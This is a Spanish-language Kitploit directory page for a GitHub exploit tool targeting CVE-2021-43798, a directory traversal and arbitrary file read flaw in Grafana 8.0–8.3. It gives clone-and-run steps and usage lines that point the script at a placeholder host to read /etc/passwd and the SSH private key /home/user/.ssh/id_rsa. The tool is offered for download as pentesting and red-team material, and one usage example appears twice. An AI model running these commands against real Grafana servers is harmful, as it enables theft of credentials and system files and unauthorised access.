Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-43798 — Recorrido de directorios y lectura arbitraria de archivos en Grafana | Kitploit
Herramientas/GitHubGitHub/wagneralves/cve-2021-43798
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubwagneralves/cve-2021-43798

CVE-2021-43798

Recorrido de directorios y lectura arbitraria de archivos en Grafana

Ver Repositorio
12hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-43798

Directory Traversal y Lectura Arbitraria de Archivos en Grafana

Authors:
Wagner Alves - Analista de Red Team

Este exploit aprovecha las vulnerabilidades de Directory Traversal y lectura arbitraria de archivos en Grafana 8.0 - 8.3, lo que permite leer archivos como /etc/passwd, /etc/hosts, /home/user/.ssh/id_rsa, /etc/os-release y otros archivos interesantes.

Instalación

git clone https://github.com/wagneralves/CVE-2021-43798.git
cd CVE-2021-43798
chmod +x ExploitGrafana.sh

Uso

ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /etc/passwd

ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa

ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa

Descargar herramienta